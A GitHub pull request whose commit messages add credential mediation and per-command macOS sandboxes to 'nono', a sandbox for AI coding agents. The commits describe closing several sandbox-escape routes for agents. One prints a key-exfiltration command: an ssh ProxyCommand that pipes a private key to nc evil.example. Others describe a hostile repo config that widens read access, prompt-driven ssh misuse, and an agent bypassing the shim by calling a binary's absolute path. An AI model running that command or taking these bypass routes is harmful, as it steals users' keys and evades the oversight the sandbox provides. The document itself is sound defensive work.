feat: credential_routes — credential mediation for Anthropic OAuth + gateway routes#51
Draft
christine-at-datadog wants to merge 48 commits into
Introduces a mediation framework that intercepts command execution within sandboxed sessions, requiring admin approval for sensitive operations. Includes audit trail logging, Unix socket control server, and per-command sandbox shims. Signed-off-by: James Carnegie <me@kipz.org>
Adds a macOS menu bar application that discovers active nono sessions and provides a UI for reviewing and approving/denying mediated commands. Signed-off-by: James Carnegie <me@kipz.org>
Signed-off-by: James Carnegie <me@kipz.org>
Commands like `gh` authenticate via macOS Keychain using mach-lookup IPC to securityd. The per-command Seatbelt sandbox blocks these mach-lookups by default, causing 401 auth failures when gh tries to retrieve its stored GitHub token.
Add `keychain_access: bool` to CommandSandbox. When true, the per-command sandbox grants read access to keychain DB files (login.keychain-db, metadata.keychain-db), which triggers the existing mach-lookup deny skip in the Seatbelt profile generator. This allows commands to authenticate via keychain while keeping all other sandbox restrictions (filesystem, network allowed_hosts) intact.
Also documents that the Approve action intentionally runs without a per-command sandbox (None), because Seatbelt can still block keychain mach-lookups and keychain file grants alone are insufficient for all auth paths.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: James Carnegie <me@kipz.org>
After the explicit pass, `profile::expand_vars` now resolves any remaining
`$VAR` / `${VAR}` tokens (uppercase+underscore+digit names) from the
process environment. Unset vars are left literal, matching the existing
`$XDG_RUNTIME_DIR` fallback so downstream `add_sandbox_*` helpers log
"does not exist, skipping" rather than failing the session.
Also switches per-command mediation sandbox paths from `expand_home`
to `expand_vars` so `$WORKDIR`, `$HOME`, XDG vars, and any launch-time
env var (e.g. a caller-provided `$GIT_ROOT`) resolve consistently in
both the main and per-command sandboxes. `SessionCtx` gains a `workdir`
field threaded from `execution_runtime` through `session::setup` and
`server::run` so per-command expansion uses the same workdir as the
rest of nono.
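The expansion rule described above can be sketched roughly as follows. This is an illustration only, not the code in `profile::expand_vars`: the function name `expand_tokens` is hypothetical, and the environment is passed in as a map (rather than read from the process) so the behaviour is deterministic.

```rust
use std::collections::HashMap;

/// Token names are limited to uppercase ASCII letters, digits, and underscores.
fn is_name_byte(b: u8) -> bool {
    b.is_ascii_uppercase() || b.is_ascii_digit() || b == b'_'
}

/// Hypothetical helper: expands `$VAR` and `${VAR}` tokens from `env`.
/// Unset or malformed tokens are left literal.
fn expand_tokens(input: &str, env: &HashMap<String, String>) -> String {
    let bytes = input.as_bytes();
    let mut out = String::with_capacity(input.len());
    let mut i = 0;
    while let Some(off) = input[i..].find('$') {
        let dollar = i + off;
        out.push_str(&input[i..dollar]);
        let braced = bytes.get(dollar + 1) == Some(&b'{');
        let name_start = dollar + if braced { 2 } else { 1 };
        let mut name_end = name_start;
        while name_end < bytes.len() && is_name_byte(bytes[name_end]) {
            name_end += 1;
        }
        // A braced token must be closed by `}`; otherwise it is plain text.
        let closed = !braced || bytes.get(name_end) == Some(&b'}');
        let token_end = if braced && closed { name_end + 1 } else { name_end };
        let name = &input[name_start..name_end];
        match env.get(name) {
            Some(value) if !name.is_empty() && closed => {
                out.push_str(value);
                i = token_end;
            }
            _ => {
                // Unset or malformed: keep the `$` and continue scanning after it.
                out.push('$');
                i = dollar + 1;
            }
        }
    }
    out.push_str(&input[i..]);
    out
}
```

With `HOME=/home/u` in the map, `$HOME/.local/bin` becomes `/home/u/.local/bin`, while `$UNSET/x` is returned unchanged so a downstream helper can report the path as missing.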
`expand_vars` already resolved $VAR / ${VAR} tokens in top-level
filesystem paths, policy.* paths, command_args, and per-command
sandbox paths. Extend the same expansion to the remaining
user-authored string fields in the profile:
- `mediation.commands[].intercept[].args_prefix` — the intercept
matcher compared each entry literally against the incoming argv,
so `"$USER"` used to be a dead string. Expanding at profile-load
time lets authors write session-aware matchers (e.g. the macOS
Keychain `security find-generic-password <user> ...` rule) without
install-time `sed` substitutions over the profile file.
- `mediation.commands[].binary_path` — consumed verbatim by `PathBuf::from`,
now expanded so profiles can point at user-specific binaries like
`$HOME/.local/bin/tool`.
- `network.custom_credentials[].{tls_ca,tls_client_cert,tls_client_key}` —
previously used the narrower `policy::expand_path` which only handled
`~`, `$HOME`, `$TMPDIR`. Switched to the full `expand_str` so any
configured env var (e.g. `$XDG_CONFIG_HOME`) resolves.
Introduces `profile::expand_str` as the string-returning core of the
expansion pipeline. `expand_vars` now delegates to it. Threads the
session `workdir` through `resolve_credentials`, `build_proxy_config_from_flags`,
`start_proxy_runtime`, and `resolve_command` so `$WORKDIR` resolves
consistently across all expansion sites.
Stamps each audit.jsonl entry with session_id, session_name, nono_pid, sandboxed_pid, and command_pid so operators can correlate commands across a session and trace the full process hierarchy.
Process hierarchy per log entry:
- nono_pid: the nono supervisor (unsandboxed parent)
- sandboxed_pid: the direct child process nono sandboxed (e.g. claude, codex)
- command_pid: the shim process that ran the specific command (e.g. echo, git)
The session_id/session_name are pre-generated in execution_runtime before mediation setup so audit.jsonl and the session record share the same values. sandboxed_pid is resolved after fork via an Arc<OnceLock<u32>> latch shared between the mediation server and the on_fork callback.
ShimRequest gains a pid field so the mediated path can record command_pid. The shim's AuditEvent also gains command_pid for the audit-only datagram path. All new AuditEvent fields use #[serde(default)] for backward compatibility with older shims that do not send them.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Mediated passthrough previously buffered stdio: the shim read stdin with a 50ms timeout into a UTF-8 String, the server spawned the real binary with Stdio::piped() + wait_with_output(), and the parent's ChildStdin dropped before the child could read. ssh/git over a binary pipe hit SIGPIPE; every long-running mediated command (gh, kubectl, ...) silently buffered output until exit.
The shim now sends its stdin/stdout/stderr fds via SCM_RIGHTS after the JSON request. The server passes them straight to the real binary via Stdio::from(...) for no-intercept passthrough (and the allow_commands sub-branch and admin_passthrough), then wait()s. Capture/Respond/Approve drop the passed fds and keep the existing buffered behaviour so they can still inspect or transform the output.
The stdin field is removed from ShimRequest, along with the read_stdin_nonblocking helper; shim and server are versioned together, so no wire compatibility is needed.
Tests: added a streaming socketpair harness, a binary-roundtrip test covering 0xFF bytes through stdin/stdout, and a Respond-path test that verifies the dropped fds let the test side see EOF.
… command
Adds an optional CallerPolicy on each CommandEntry:
- agent_allowed: bool (default true): whether the primary sandbox (no NONO_SANDBOX_CONTEXT) may invoke this command.
- allowed_parents: Option<Vec<String>>: restrict which mediated parents may invoke. None (field absent) accepts any parent (existing behaviour). Some([]) blocks every mediated parent. Some(["git"]) permits only the listed parents.
The gate fires at the top of apply(), before the existing allow_commands skip-intercepts branch, so a parent allowed by allowed_parents still flows through unchanged. Rejected calls return exit 126 with action_type "denied".
Defaults preserve full backward compatibility: a profile with no caller_policy field on a command keeps current behaviour (agent + any parent allowed).
Use case: ssh / ssh-keygen in shadowfax. Set agent_allowed=false, allowed_parents=["git"] so a malicious prompt cannot invoke them directly to authenticate to attacker-controlled hosts (or sign arbitrary data) using the user's keys via the per-command sandbox.
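A minimal sketch of the gate described above, assuming the caller is modelled as `None` for the primary sandbox and `Some(name)` for a mediated parent. The function `caller_permitted` and the constant `DENIED_EXIT` are hypothetical names for illustration; the real check lives at the top of `apply()`.

```rust
/// Exit status returned for rejected calls, per the commit message.
const DENIED_EXIT: i32 = 126;

struct CallerPolicy {
    agent_allowed: bool,
    allowed_parents: Option<Vec<String>>,
}

impl Default for CallerPolicy {
    /// Defaults preserve the pre-existing behaviour: agent and any parent allowed.
    fn default() -> Self {
        CallerPolicy { agent_allowed: true, allowed_parents: None }
    }
}

/// Hypothetical gate. `parent` is `None` when the primary sandbox calls
/// (no NONO_SANDBOX_CONTEXT) and `Some(name)` for a mediated parent.
fn caller_permitted(policy: &CallerPolicy, parent: Option<&str>) -> bool {
    match parent {
        None => policy.agent_allowed,
        Some(name) => match &policy.allowed_parents {
            None => true, // field absent: any parent may invoke
            Some(list) => list.iter().any(|p| p == name),
        },
    }
}

/// Maps the gate decision to an exit status; `None` means "continue to apply()".
fn gate_exit_code(policy: &CallerPolicy, parent: Option<&str>) -> Option<i32> {
    if caller_permitted(policy, parent) { None } else { Some(DENIED_EXIT) }
}
```

For the ssh use case, a policy with `agent_allowed: false` and `allowed_parents: Some(vec!["git".into()])` rejects the agent and every parent except `git`.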
Sending three separate sendmsg(SCM_RIGHTS) calls for stdin/stdout/stderr fails with EMSGSIZE (os error 40) on macOS when the socket receive buffer already holds a large JSON request, as happens when git is invoked from within gh's execution sandbox, which adds proxy and session env vars.
Replace the three individual sends with a single sendmsg carrying all three fds in one SCM_RIGHTS control message, and update recv_three_fds to receive them in a matching single recvmsg call. This is the standard idiom for passing multiple fds and avoids the macOS control-buffer constraint entirely.
Fixes: DataDog/shadowfax#95
The shim now sends its own cwd in `ShimRequest.cwd`, and the server sets it on the spawned binary via `Command::current_dir`.
Without this, the spawned binary inherited the mediation server's launch cwd. Tools that resolve config from cwd silently operated on the wrong target, with `git` in a worktree being the canonical case: discovery would walk up from the server's cwd, find the wrong `.git`, and report the wrong branch and toplevel.
The new field is `Option<String>` with `#[serde(default)]`:
- old shim → new server: missing field → legacy behaviour (server cwd)
- new shim → old server: extra field is ignored
- unreadable cwd: shim sends None → legacy behaviour
- non-directory cwd: server logs a warning and falls back to its own cwd
Adds `test_passthrough_uses_request_cwd`: drives `apply()` end-to-end with a real `/bin/pwd` and asserts the spawned process prints the caller's cwd, not the server's.
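The fallback rules listed above could be expressed along these lines. This is a sketch under assumptions: `effective_cwd` is a hypothetical name, and the warning goes to stderr here rather than through whatever logging the server actually uses.

```rust
use std::path::{Path, PathBuf};

/// Hypothetical helper: picks the working directory for the spawned binary.
/// `requested` is the optional cwd sent by the shim; `server_cwd` is the
/// mediation server's own cwd, used as the legacy fallback.
fn effective_cwd(requested: Option<&str>, server_cwd: &Path) -> PathBuf {
    match requested {
        // Caller supplied a usable directory: run the binary there.
        Some(dir) if Path::new(dir).is_dir() => PathBuf::from(dir),
        // Caller supplied something that is not a directory: warn and fall back.
        Some(dir) => {
            eprintln!("warning: requested cwd {dir:?} is not a directory, using server cwd");
            server_cwd.to_path_buf()
        }
        // Old shim or unreadable cwd: legacy behaviour.
        None => server_cwd.to_path_buf(),
    }
}
```

The result would then be passed to `std::process::Command::current_dir` before spawning.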
The mediation/* and nono-shim formatting drift accumulated across the 13-commit mediation series. Folding the fmt fixes into the originating commits caused conflicts because subsequent mediation commits re-touched the same lines, so capture the cumulative fmt result here instead.
Signed-off-by: James Carnegie <me@kipz.org>
When nono creates an audit shim for a binary at session start, the shim later runs `resolve_real_binary` which re-walks PATH to find the real target. Intermediate shells (e.g. husky pre-commit hooks, lint-staged workers) often munge PATH between session start and shim invocation, stripping user toolchain dirs that contained the real binary. The walk then returns nothing and the shim reports `nono-shim: <name>: command not found` even though the real binary is still on disk at the path nono saw at session start.
This change makes audit shim resolution deterministic by recording the resolved absolute path at session start and consulting it first at exec time:
- A new sibling dir `<session_dir>/shim-sources/` holds one sidecar per shim: `<name>` containing the absolute path of the binary the shim was created for. Both mediated commands and universal audit shims write a sidecar.
- `SessionHandle` exposes `shim_sources_dir` and the path is forwarded to mediated subprocesses via a new `NONO_SHIM_SOURCES_DIR` env var (alongside `NONO_SHIM_DIR`). The session-level dir is reused for filtered per-command sandboxes; sidecars are created once and shared, since the recorded paths do not change.
- `nono-shim::resolve_real_binary` now consults `NONO_SHIM_SOURCES_DIR/<name>` first and only falls back to the existing PATH walk if the sidecar is missing or its recorded path is no longer an executable file.
Tests:
- 8 new unit tests in nono-shim cover sidecar hits, missing dirs, trimming, deleted/non-executable targets, and the PATH-walk fallback.
- 2 new unit tests in mediation::session cover sidecar writes and overwrites.
- The existing `test_allow_commands_sets_nono_shim_dir_to_filtered_dir` test is extended to assert `NONO_SHIM_SOURCES_DIR` is forwarded unchanged into the per-command sandbox env.
…main
When a profile sets `network.allow_domain`, nono switches to
`NetworkMode::ProxyOnly`, which emits `(deny network*)` plus narrow
exceptions for the proxy port and DNS. Seatbelt classifies AF_UNIX
`connect(2)` as `network-outbound`, so the base deny blocks the
audit/mediation shim's connect to `<session_dir>/{mediation,control,
audit}.sock`.
`emit_unix_socket_rules` only emits exceptions for explicit
`UnixSocketCapability` entries; the `FsCapability` directory grant
the runtime adds for `handle.session_dir` covers file ops but not
socket connect. Under `NetworkMode::AllowAll` (default with no
`allow_domain`) the bug was masked by `(allow network-outbound)`.
Add a directory-scoped `UnixSocketCapability::new_dir(session_dir,
Connect)` alongside the existing FsCapability so the regex carve-out
covers all three direct-child sockets without leaking access deeper
under the session dir. Existing rule-emission tests in sandbox/macos.rs
already cover the directory-grant + ProxyOnly path
(test_generate_profile_unix_socket_dir_emits_non_recursive_regex).
Fixes #33.
Replace whole-replacement of `mediation` in merge_profiles with a per-field merge. The legacy behaviour fully replaced base mediation when child declared any mediation block, which silently dropped every mediated command the base set up: a footgun when downstream profiles add a single command via `extends`.
Merge rules:
- commands: keyed by `name`. Same-name collisions get per-field merge (binary_path child-wins, intercept rules dedup by args_prefix with child first under first-match-wins, sandbox recursive-merges, caller_policy applies restrictive-wins). Distinct names append: base first, then names new to the child.
- env.block: dedup_append.
- CommandSandbox: network.block and keychain_access OR; allowed_hosts and fs_*/allow_commands union via dedup_append.
- CallerPolicy.agent_allowed: AND (managed deny survives a permissive child). allowed_parents: None==any, Some==restriction, intersection of two Somes preserves the strictest.
Adds 14 unit tests in mediation::merge::tests covering each rule (name append/collide, intercept dedup, AND/intersection, network.block OR, allowed_hosts/fs union, env block union, empty-base/empty-child, is_active invariant).
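Two of the merge rules above, the `dedup_append` union and the restrictive-wins `CallerPolicy` merge, might look roughly like this. The struct shape follows the commit text; the function names and signatures are assumptions for illustration, not the code in `mediation::merge`.

```rust
#[derive(Debug, Clone, PartialEq)]
struct CallerPolicy {
    agent_allowed: bool,
    allowed_parents: Option<Vec<String>>,
}

/// Union that keeps base order and appends only entries new to the child.
fn dedup_append(base: &[String], child: &[String]) -> Vec<String> {
    let mut merged = base.to_vec();
    for item in child {
        if !merged.contains(item) {
            merged.push(item.clone());
        }
    }
    merged
}

/// Restrictive-wins merge: a deny or restriction on either side survives.
fn merge_caller_policy(base: &CallerPolicy, child: &CallerPolicy) -> CallerPolicy {
    let allowed_parents = match (&base.allowed_parents, &child.allowed_parents) {
        // None means "any parent", so it never narrows the other side.
        (None, None) => None,
        (Some(p), None) | (None, Some(p)) => Some(p.clone()),
        // Two restrictions: only parents allowed by both remain.
        (Some(a), Some(b)) => Some(a.iter().filter(|x| b.contains(*x)).cloned().collect()),
    };
    CallerPolicy {
        agent_allowed: base.agent_allowed && child.agent_allowed,
        allowed_parents,
    }
}
```

Under this sketch a base with `agent_allowed: false` stays denied even when the extending profile sets it to `true`.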
Previously, nonce promotion fired only when an exec'd mediated command's
argv element or sandbox-env value *began* with `nono_`. That breaks any
caller that embeds the nonce inside a wider string — the canonical case
being an HTTP header built up by a shell script:
token=$(some-mediated-cmd auth)
curl -H "X-Token: $token" https://example/
Here `-H` is followed by `X-Token: nono_<64-hex>`, which fails the
`starts_with("nono_")` check, so curl receives the literal nonce instead
of the real token. The only workaround was to demand that callers separate
the credential from its envelope; exporting it first
(`export TOKEN=…; curl -H "X-Token: $TOKEN"`) does not help, because curl's
argv still contains the prefixed nonce.
This change replaces the prefix check with a substring rewrite. Any
`nono_` followed by 64 lowercase hex characters is resolved against the
broker and substituted in place. Unmatched (unknown) nonces are left
verbatim, matching the existing argv behaviour and avoiding a probing
oracle. The same rewrite is applied inside env values (e.g.
`AUTH_HEADER="Authorization: Bearer nono_…"`).
Behaviour notes:
- The prefix `nono_` is ASCII, so the byte-level scan never lands
inside a multi-byte UTF-8 character.
- 64 lowercase hex chars is the exact format `TokenBroker::issue` emits;
uppercase hex and shorter sequences are deliberately not matched so
noisy input strings cannot accidentally trigger a resolve.
- One existing env test (`test_build_exec_env_discards_unknown_nonce`)
encoded the old "discard the whole var on unknown nonce" behaviour;
it is renamed and asserts the new "leave the literal text in place"
contract instead, matching the argv path.
Added unit tests cover: pure-nonce arg, embedded nonce, multiple nonces
in one arg, malformed `nono_` prefix without 64 hex chars, malformed
prefix with uppercase hex, unknown but well-formed nonce, empty input,
no-match passthrough, and the env-value substring path including the
`DANGEROUS_ENV_VAR_NAMES` block.
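The substring rewrite can be sketched as below. The broker is stood in for by a closure, and `rewrite_nonces` is a hypothetical name; the matching rule (`nono_` followed by exactly 64 lowercase hex characters, unknown nonces left verbatim) is taken from the description above.

```rust
const PREFIX: &str = "nono_";
const HEX_LEN: usize = 64;

/// Hypothetical sketch: replaces every well-formed nonce that `resolve`
/// recognises; everything else is copied through unchanged.
fn rewrite_nonces<F>(input: &str, resolve: F) -> String
where
    F: Fn(&str) -> Option<String>,
{
    let bytes = input.as_bytes();
    let mut out = String::with_capacity(input.len());
    let mut i = 0;
    while let Some(off) = input[i..].find(PREFIX) {
        let start = i + off;
        let hex_start = start + PREFIX.len();
        let hex_end = hex_start + HEX_LEN;
        // Only lowercase hex counts; uppercase or short runs are not nonces.
        let well_formed = hex_end <= bytes.len()
            && bytes[hex_start..hex_end]
                .iter()
                .all(|b| matches!(b, b'0'..=b'9' | b'a'..=b'f'));
        out.push_str(&input[i..start]);
        if well_formed {
            let nonce = &input[start..hex_end];
            match resolve(nonce) {
                Some(secret) => out.push_str(&secret),
                None => out.push_str(nonce), // unknown nonce stays verbatim
            }
            i = hex_end;
        } else {
            // Not a nonce: emit the prefix as-is and keep scanning after it.
            out.push_str(PREFIX);
            i = hex_start;
        }
    }
    out.push_str(&input[i..]);
    out
}
```

Applied to `X-Token: nono_<64-hex>`, only the nonce portion is substituted and the `X-Token: ` envelope is preserved.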
Previously, mediation session setup walked every directory on PATH and
symlinked `nono-shim` for any executable not already mediated. Each
invocation of those non-mediated commands went through `run_audit` in
nono-shim, which used `Command::status()` (fork + wait) and emitted a
fire-and-forget audit event via a datagram socket. Mediated commands
continue to flow through `run_mediated` as before.
The universal-audit path had two material costs:
1. Process accounting. Every non-mediated command kept a shim parent
resident waiting on its child. Under heavy parallel workloads this
doubled the steady-state process count and could push the user past
the per-user `RLIMIT_NPROC` soft limit, at which point the shim's
spawn returned EAGAIN ("Resource temporarily unavailable") and the
command failed.
2. Surface area. The shim carried sidecar-resolution machinery, a second
exec mode, and three env vars (`NONO_AUDIT_SOCKET`,
`NONO_MEDIATED_COMMANDS`, `NONO_SHIM_SOURCES_DIR`) that only existed
to support the audit path.
This change removes the universal-audit pass and the dead code it
supported:
- `mediation/session.rs` no longer walks PATH to symlink shims, no longer
binds an audit datagram socket, and no longer writes source sidecars.
`SessionHandle` loses `shim_sources_dir`, `mediated_commands`, and
`audit_socket_path`.
- `mediation/server.rs` drops `run_audit_receiver`, `bind_dgram_owner_only`,
and the audit-socket bind. `log_mediated_audit` + `append_audit_log`
remain for mediated-command logging.
- `mediation/policy.rs` drops `shim_sources_dir` from `SessionCtx` and
the `NONO_SHIM_SOURCES_DIR` env forwarding (no consumer remains).
- `execution_runtime.rs` no longer exports `NONO_AUDIT_SOCKET`,
`NONO_MEDIATED_COMMANDS`, or `NONO_SHIM_SOURCES_DIR` to the child.
- `nono-shim/main.rs` drops `run_audit`, `send_audit_event`, the
`AuditEvent` struct, `is_mediated`, and the `resolve_real_binary`
sidecar/PATH-walk fallback. `run()` always calls `run_mediated()`
because every shim symlink in the session dir is now a mediated
command by construction.
- `tests/integration/test_mediation_audit.sh` removed; the rest of the
mediation suite covers the remaining flows.
Also folds in the outstanding fmt + clippy suggestions on the touched
files so the workspace passes `cargo clippy --workspace --all-targets
--all-features -- -D warnings -D clippy::unwrap_used` and `cargo fmt
--check`.
Net: 130 added / 1186 removed across 10 files. `cargo test --workspace`
runs 2187 tests, all green.
Profile authors can now place `@<provider>:<query>` tokens in any
access-granting path list (top-level `filesystem.{allow,read,write,
allow_file,read_file,write_file}` or per-command
`mediation.commands[].sandbox.{fs_read,fs_read_file,fs_write,
fs_write_file}`). At profile finalize the token is replaced inline by
the named provider's expansion, splicing one or more concrete paths
into the list in place.
The first built-in provider is `@git:read-paths`, which shells out to
`git config --list --show-origin` and returns every file in the
effective config chain plus the values of well-known path-valued keys
(core.attributesFile, core.excludesFile, core.hooksPath,
commit.template). This lets a profile that mediates `git` cover the
files git itself wants to read at startup without enumerating every
per-user dotfile location.
Behaviour:
- Literal paths pass through unchanged.
- Tokens with unknown providers/queries fail profile-load with a clear
error, so typos surface immediately instead of later as
capability-construction failures on a path named `@foo:bar`.
- Missing `git` binary or non-zero exit is treated as "no expansion"
(silent empty list), so the profile keeps working in environments
without git.
Excluded fields: deny / bypass_protection / suppress_save_prompt —
fanning a token out into deny rules has confusing semantics, and the
bookkeeping fields are not capability grants.
Before this change, the provider ran `git config --list --show-origin` from the agent's cwd. If that cwd is inside a git repo, the result included entries from per-repo `.git/config`, and any path-valued keys in that scope (`core.attributesFile`, `core.excludesFile`, `core.hooksPath`, `commit.template`) would be added to the sandbox's read-allow list at session start.
That created a real sandbox-bypass primitive in the clone-and-run threat model: a malicious repo could set `[core] attributesFile = /etc/passwd` in its `.git/config`, and the next agent session started inside that clone would whitelist `/etc/passwd` for the mediated `git` command.
The fix filters the provider's output by config scope. The CLI invocation switches to `--show-scope` (without `--global`, because the CLI scope flag suppresses `include.path` traversal, losing the main reason the provider exists). The parser then keeps lines tagged `global` or `system` and drops `local` / `worktree` / `command`.
Coverage preserved:
- `~/.gitconfig` + its full `include.path` / `includeIf` chain
- `/etc/gitconfig` (admin-controlled, trusted)
- All path-valued keys set in those scopes
Coverage removed (intentionally):
- Per-repo `.git/config` path-valued overrides. These are rarely used in practice for the keys this provider cares about, and the repo's own working tree is already accessible to the mediated git command via the profile's static fs_read grants.
Tests:
- New `git_read_paths_excludes_per_repo_local_config_overrides`: end-to-end regression that creates a real hostile `.git/config`, invokes the provider from inside the repo, and asserts the local scope's `/etc/passwd` attributesFile does NOT leak into the output while the global scope's path does.
- New `git_read_paths_from_stdout_drops_local_and_worktree_scopes`: unit-level check of the parser-side filter.
- Existing stdout-format tests updated to the new `<scope>\t<origin>\t<key>=<value>` shape.
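A rough sketch of the parser-side scope filter, assuming the `<scope>\t<origin>\t<key>=<value>` line shape quoted above and git's `file:` origin prefix. The function name `paths_from_config_listing` is hypothetical, and details such as `~` expansion are omitted.

```rust
/// Path-valued keys the provider cares about, compared case-insensitively.
const PATH_KEYS: [&str; 4] = [
    "core.attributesfile",
    "core.excludesfile",
    "core.hookspath",
    "commit.template",
];

fn push_unique(paths: &mut Vec<String>, path: &str) {
    if !paths.iter().any(|p| p == path) {
        paths.push(path.to_string());
    }
}

/// Hypothetical parser: collects config files and path-valued keys, but only
/// from lines tagged `global` or `system`.
fn paths_from_config_listing(stdout: &str) -> Vec<String> {
    let mut paths = Vec::new();
    for line in stdout.lines() {
        let mut fields = line.splitn(3, '\t');
        let (Some(scope), Some(origin), Some(entry)) =
            (fields.next(), fields.next(), fields.next())
        else {
            continue; // malformed line
        };
        // Drop local / worktree / command scopes: a cloned repo controls those.
        if scope != "global" && scope != "system" {
            continue;
        }
        if let Some(file) = origin.strip_prefix("file:") {
            push_unique(&mut paths, file);
        }
        if let Some((key, value)) = entry.split_once('=') {
            if PATH_KEYS.iter().any(|k| key.eq_ignore_ascii_case(k)) {
                push_unique(&mut paths, value);
            }
        }
    }
    paths
}
```

A `local` line carrying `core.attributesfile=/etc/passwd` is skipped before its origin or value is ever inspected, so it cannot reach the read-allow list.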
Routing `core.hooksPath` (a directory) through the same expansion as
`core.attributesFile` and friends (files) caused capability-construction
failures in consumers that placed `@git:config-paths` in `fs_read_file`:
that list only accepts files, so the hooks directory entry was silently
rejected and the hook scripts under it remained unreachable.
This splits the provider so each kind goes to the right capability
list:
- `@git:config-files` — every config file in the effective `global` +
`system` chain (with `include.path` / `includeIf` traversal) plus the
values of file-typed path keys (`core.attributesFile`,
`core.excludesFile`, `commit.template`). Intended for `fs_read_file`.
- `@git:hooks-path` — value of `core.hooksPath` from `global` or
`system` scope, if set. Intended for `fs_read`.
Internally the parser now returns a `GitConfigPaths { files, dirs }`
struct and the two query functions project the appropriate field. The
single-shell-out variant `read_paths()` is removed; consumers call
`read_files()` / `read_hooks_path()` directly.
The local/worktree-scope filter is unchanged: only `global` and
`system` lines contribute paths, so a hostile per-repo `.git/config`
still cannot widen the sandbox.
Tests updated to reflect the new split, and a dedicated
`parse_paths_from_stdout_routes_hooks_path_to_dirs` regression locks in
the routing.
Note: `@git:config-paths` no longer exists. Profiles that referenced
the old name must move to `@git:config-files` (in `fs_read_file`) plus
`@git:hooks-path` (in `fs_read`) where applicable.
Move `caps.platform_rules()` emission from between read-allows and
write-allows to AFTER write-allows. Targeted denies carried via
`add_deny_access`, group deny rules, and `unsafe_macos_seatbelt_rules`
were silently overridden by broad user write allows because Seatbelt is
last-rule-wins for filtered rules of the same operation.
Reproduces directly with `sandbox-exec`:
(allow file-write* (subpath "/"))
(deny file-write* (subpath "/protected"))
=> write to /protected DENIED
(deny file-write* (subpath "/protected"))
(allow file-write* (subpath "/"))
=> write to /protected SUCCEEDS
The previous comment ("more specific rules always win regardless of
order") is not how Seatbelt behaves for filtered subpath rules. The
deny-unlink case the old order was protecting against is preserved
because `(deny file-write-unlink)` is unselectored and blocks regardless
of where it sits relative to selectored write allows (verified via
`sandbox-exec`).
Updates two unit tests that asserted the old (broken) order and adds
explicit coverage for `(deny file-write* (subpath ...))` landing after
write allows.
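The ordering fix can be illustrated with a small profile emitter. This is a sketch only: `emit_write_rules` and `escape` are hypothetical names, and the real generator in `sandbox/macos.rs` emits many more rule kinds.

```rust
/// Escapes backslashes and double quotes for a Seatbelt string literal.
fn escape(path: &str) -> String {
    path.replace('\\', "\\\\").replace('"', "\\\"")
}

/// Hypothetical emitter: write allows first, targeted denies afterwards.
fn emit_write_rules(allows: &[&str], denies: &[&str]) -> String {
    let mut profile = String::new();
    for path in allows {
        profile.push_str(&format!("(allow file-write* (subpath \"{}\"))\n", escape(path)));
    }
    // Denies are emitted last so that a broad allow cannot override them
    // under last-rule-wins evaluation.
    for path in denies {
        profile.push_str(&format!("(deny file-write* (subpath \"{}\"))\n", escape(path)));
    }
    profile
}
```

Calling `emit_write_rules(&["/"], &["/protected"])` yields the first ordering from the `sandbox-exec` reproduction, the one in which the write to `/protected` is denied.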
Two E0283 ambiguities introduced when typed_path entered the dependency tree (via sigstore-sign 0.8.0): AsRef<_> on Cow<str> became ambiguous between alloc and typed_path impls. Fix by adding explicit `as &str` casts at the two call sites. Also fix a test using credential_format: String (now Option<String>) after the network_policy field type change in main. Signed-off-by: James Carnegie <me@kipz.org>
Per-command Seatbelt sandboxes previously allowed `process-exec*` unconditionally. A command granted `fs_read` on a sensitive directory (e.g. `ssh` with `~/.ssh`) could spawn an arbitrary child that inherited the same grants and exfiltrated the data, for example `ssh -o ProxyCommand="/bin/sh -c 'cat ~/.ssh/id_ed25519 | nc evil.example'"`.
Changes:
- `CapabilitySet`: new `restrict_process_exec()` builder plus `allow_exec_path()` / `allow_exec_subpath()` for the allowlist. Default-off: top-level / non-mediated profiles are unaffected.
- `macos::generate_profile`: emits explicit `(allow process-exec (literal|subpath ...))` rules when restriction is set, otherwise retains the historical blanket `(allow process-exec*)`.
- `CommandSandbox`: new `allow_process_exec: bool` field (default false) as a broad opt-out for commands with helper sprawl (git, gh, aws, kubectl, etc.) where enumerating helpers is impractical. Merges with AND so an extending profile cannot loosen base policy.
- Mediation `policy.rs`: per-command sandboxes now call `restrict_process_exec()` unless `allow_process_exec` is set; the command's own binary, the nono-shim (for nested mediation), and every `allow_commands` target are exec-allowed by path. This lets `allow_commands` bypass the shim entirely: listed binaries run inside the caller's sandbox without re-mediation.
`process-fork` remains allowed so threading and fork-without-exec keep working; the kernel's deny on exec is what closes the escape.
Previously exec_passthrough was called with None for the sandbox when a
command was reached via a parent's allow_commands list, leaving the child
entirely unsandboxed. This re-opens the ProxyCommand exfil class that the
process-exec default-deny is designed to close (issue nolabs-ai#249).
Signed-off-by: James Carnegie <me@kipz.org>
Add a "Per-command Sandboxes" section to profile-authoring.mdx covering all CommandSandbox fields (fs_read/write, network, keychain_access, allow_commands, allow_process_exec) with an example and a warning that allow_process_exec: true widens the sandbox back to pre-v0.59.0 behaviour for that command. Update the policy.rs code comment to reference the new docs section. Signed-off-by: James Carnegie <me@kipz.org>
…undary Adds test_allow_process_exec_does_not_bypass_fs_sandbox: verifies that even with allow_process_exec: true, subprocesses spawned inside a per-command sandbox cannot read files outside the sandbox's fs_read grants. This guards the git-via-allow_process_exec concern: git carries allow_process_exec: true for hooks/helpers, but a subprocess it spawns (e.g. ssh via ProxyCommand) must still be confined to git's filesystem grants and cannot exfiltrate files like ~/.ssh private keys. Uses ENV_LOCK when reading HOME to avoid a race with tests that temporarily set HOME to a /tmp path (rollback_runtime, exec_strategy). Signed-off-by: James Carnegie <me@kipz.org>
…pass
Mediation shims intercept commands invoked by name via a PATH-prepend shim directory. Without a corresponding seatbelt deny rule on each mediated command's real binary path, the sandboxed agent can invoke the binary directly by absolute path, bypassing the shim and receiving the real credential instead of a nonce.
`SessionHandle.blocked_binaries` was already populated with the real path of every mediated command (field doc: "for seatbelt deny rules") but was never consumed; the field has been dead since mediation was introduced.
This change wires `blocked_binaries` into the agent's capability set:
- `CapabilitySet::deny_exec_path()`: new builder method that records paths to deny.
- `generate_profile()` (macos.rs): emits `(deny process-exec (literal "<path>"))` after `(allow process-exec*)` in the unrestricted branch. Seatbelt is last-rule-wins for same-operation filtered rules, so the deny placed after the broad allow takes precedence.
- `execution_runtime.rs`: consumes `handle.blocked_binaries` and calls `caps.deny_exec_path()` for each, closing the bypass for all mediated commands (gh, security, ddtool, kubectl, glab, aws-vault, etc.).
